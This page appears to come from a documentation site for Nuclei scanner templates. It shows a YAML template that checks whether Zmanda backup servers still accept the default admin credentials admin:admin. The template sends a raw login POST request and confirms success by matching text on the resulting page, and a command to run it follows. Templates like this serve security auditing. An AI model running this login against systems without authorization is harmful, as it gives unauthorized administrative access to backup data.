Skip to content

Zmanda Default Login

ID: zmanda-default-login

Severity: high

Author: Techryptic (@Tech)

Tags: zmanda,default-login

Zmanda default admin credentials admin:admin were discovered.

id: zmanda-default-login
info:
name: Zmanda Default Login
author: Techryptic (@Tech)
severity: high
description: Zmanda default admin credentials admin:admin were discovered.
reference:
- https://www.zmanda.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: zmanda,default-login
http:
- raw:
- |
POST /ZMC_Admin_Login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: zmc_cookies_enabled=true
login=AEE&last_page=&username={{username}}&password={{password}}&submit=Login&JS_SWITCH=JS_ON
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "ZMC - Backup Set Management"
- type: status
status:
- 200
# digest: 4a0a004730450221009cd2af5badc5d0f9ecc94e8fed8df6f4c954dfd50158c384a3dbbff5cb4e7804022010b79a8b5cf8044cfccebf917e5c934cc0a7c0b5ee2505c88bbf2f42853b3a3f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/zmanda/zmanda-default-login.yaml"

View on Github